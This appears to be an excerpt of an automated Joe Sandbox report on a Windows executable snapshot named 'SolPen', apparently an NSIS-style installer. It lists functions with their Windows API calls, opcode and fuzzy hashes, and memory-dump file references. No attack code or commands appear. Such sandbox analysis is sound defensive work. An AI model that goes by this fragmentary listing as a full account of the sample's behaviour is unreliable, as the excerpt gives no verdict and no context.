Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D

Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86

Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85

Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86

Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86

Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 004073C5
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
GlobalFree.KERNELBASE(?), ref: 0040743D
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E

Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE

Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08

Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

Non-executed Functions

Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404993
GetDlgItem.USER32(?,00000408), ref: 004049A0
GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
LoadBitmapW.USER32(0000006E), ref: 00404A02
SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
DeleteObject.GDI32(?), ref: 00404A79
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
ShowWindow.USER32(?,00000005), ref: 00404BCF
